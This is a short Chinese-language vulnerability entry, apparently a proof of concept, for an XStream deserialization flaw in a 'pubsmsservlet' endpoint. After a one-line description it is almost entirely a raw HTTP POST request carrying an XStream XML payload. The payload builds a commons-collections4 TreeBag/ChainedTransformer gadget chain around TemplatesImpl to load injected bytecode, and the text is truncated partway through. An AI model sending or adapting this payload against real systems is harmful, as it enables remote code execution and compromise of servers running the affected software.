漏洞描述
pubsmsservlet 接口使用 XStream 组件解析请求体，可被利用触发 XStream 反序列化。
POST /service/pubsmsservlet HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 5570
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36
<org.apache.commons.collections4.bag.TreeBag serialization="custom">
<org.apache.commons.collections4.bag.TreeBag>
<default/>
<org.apache.commons.collections4.comparators.TransformingComparator>
<decorated class="org.apache.commons.collections4.comparators.ComparableComparator"/>
<transformer class="org.apache.commons.collections4.functors.ChainedTransformer">
<iTransformers>
<org.apache.commons.collections4.functors.ConstantTransformer>
<iConstant class="java-class">com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter</iConstant>
</org.apache.commons.collections4.functors.ConstantTransformer>
<org.apache.commons.collections4.functors.InstantiateTransformer>
<iParamTypes>
<java-class>javax.xml.transform.Templates</java-class>
</iParamTypes>
<iArgs>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>xcodes</__name>
<__bytecodes>
<byte-array>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</byte-array>
</__bytecodes>
...[已截断]